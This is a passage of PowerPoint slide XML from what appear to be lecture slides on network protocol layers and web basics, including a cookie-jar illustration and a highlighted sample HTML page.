          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438443" y="3001065"/>
            <a:ext cx="2026132" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>TCP, UDP, ICMP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2178790" y="2170826"/>
            <a:ext cx="2545440" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>HTTP, FTP, IMAP, …</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1990340" y="4941321"/>
            <a:ext cx="2922338" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Ethernet, 802.11x, …</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1986109" y="5789758"/>
            <a:ext cx="2930802" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Twisted Pair, Radio, …</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Speech Bubble: Rectangle 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0AF6D9-ECA1-0642-F5FC-49FEE110AFCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228089" y="3604409"/>
            <a:ext cx="1591690" cy="1316961"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 80743"/>
              <a:gd name="adj2" fmla="val -39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Network Layer assumed to be the common denominator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="Group 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64F3FE84-E6F8-F041-9537-34F1D2AA6802}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6217479" y="852557"/>
            <a:ext cx="5701276" cy="5862932"/>
            <a:chOff x="6217479" y="852557"/>
            <a:chExt cx="5701276" cy="5862932"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Arc 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA22A621-47C9-664C-76E6-58E5581268DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6217479" y="3052417"/>
              <a:ext cx="914400" cy="3321878"/>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rc 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{213B8845-AE9E-28CF-35A1-0097E3DD1B08}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="7131879" y="3112051"/>
              <a:ext cx="914400" cy="3321878"/>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067D3F9C-A53B-872A-CB9F-30FBD38739C9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="7131877" y="852557"/>
              <a:ext cx="914400" cy="2259494"/>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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEA44E6D-BB29-58F9-FEB9-1CB65FCD8846}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="10217423" y="3052418"/>
              <a:ext cx="1069008" cy="3321878"/>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2B7ED503-9630-FBE8-3298-B7F3FF4C5B5C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1" flipV="1">
              <a:off x="9203628" y="3112052"/>
              <a:ext cx="1013795" cy="3321878"/>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864FFDC0-6F0E-682B-A436-7FE69C7719E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="9203630" y="852558"/>
              <a:ext cx="1013791" cy="2259494"/>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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3745C95F-7C6A-4979-C580-B08D4A95A36F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6539948" y="6374295"/>
              <a:ext cx="4320209" cy="34119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DD8A4F0-4431-CEA5-16B2-088997BCCA0F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6539948" y="1681740"/>
              <a:ext cx="4320209" cy="34119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911C6E4-F3B6-405E-28A5-0C1B9ABD3E22}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7995663" y="4332859"/>
              <a:ext cx="1388522" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t>IPv4, IPv6</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="TextBox 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{693C662A-B768-2C0F-53C2-D2325A46BED3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7676858" y="3604409"/>
              <a:ext cx="2026132" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t>TCP, UDP, ICMP</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="TextBox 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73850814-5286-AE12-5A42-CEDCFF0C038B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8293021" y="2875959"/>
              <a:ext cx="793807" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t>HTTP</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="TextBox 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{984366CC-F3D5-DB73-4998-3BA141B04530}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7228755" y="5061309"/>
              <a:ext cx="2922338" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t>Ethernet, 802.11x, …</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="TextBox 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B04A8BA7-9D96-97B2-05F4-5D7D519C815F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7224523" y="5789758"/>
              <a:ext cx="2930802" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t>Twisted Pair, Radio, …</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="58" name="Straight Connector 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ECAC6EA-D9D1-C44C-5B57-F3F9520F93A8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7308021" y="3462730"/>
              <a:ext cx="272387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B1274CF-45CB-0832-7355-8787E5FC277A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7177708" y="4198614"/>
              <a:ext cx="303971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80A95F8-ACA1-9ABC-CEF9-70F060AA73BD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7131877" y="4894354"/>
              <a:ext cx="30855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0133A65-28EE-6AEC-774F-3321E84DBBE3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7019233" y="5678441"/>
              <a:ext cx="328654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7" name="Speech Bubble: Rectangle 66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA02CC6F-30D8-01E2-F47E-3069B8E45AFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10396410" y="2896122"/>
              <a:ext cx="1522345" cy="1316961"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -78270"/>
                <a:gd name="adj2" fmla="val -3309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HTTP assumed to be the common denominator</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="247051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6F9E2575-489C-E62E-9B6A-AA4A96A74395}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489385" y="3036784"/>
            <a:ext cx="3421642" cy="35926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Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203200" y="1600200"/>
            <a:ext cx="11785600" cy="1149980"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each origin may set cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Including when objects are embedded from a third-party origin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{806200F6-636C-C5DF-4C57-63A9DAF6FD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7593" y="2750180"/>
            <a:ext cx="1005227" cy="1005227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{600E26D5-D8FD-BFF2-EB6E-425941385BE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635193" y="3530397"/>
            <a:ext cx="3085461" cy="3686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http://example.com/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74498EA9-79E6-B15B-B0FE-B33B7392E162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1543616" y="4048965"/>
            <a:ext cx="1313180" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Cookie Jar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D39AADD3-0E44-CB8A-3F84-4540A316F037}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489385" y="4536055"/>
            <a:ext cx="2732158" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / visited=true</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 357">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F67B07E6-E63A-3F52-9CB1-1C44676CD92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5948705" y="2673450"/>
            <a:ext cx="5547606" cy="40945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C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>doctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> html&gt;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&lt;html&gt;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&lt;head&gt;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&lt;title&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Hello World</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/title&gt;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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>“../jquery.js”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;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&lt;/head&gt;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&lt;body&gt;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&lt;h1&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Hello World</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/h1&gt;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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>/my_face.jpg"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;&lt;/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&lt;p&gt;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I am 12 and what is</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&lt;a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>href</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"wierd_thing.html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/a&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a: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&lt;/p&gt;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“http://www.images.com/cat.jpg"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;&lt;/img&gt;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&lt;/body&gt;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&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
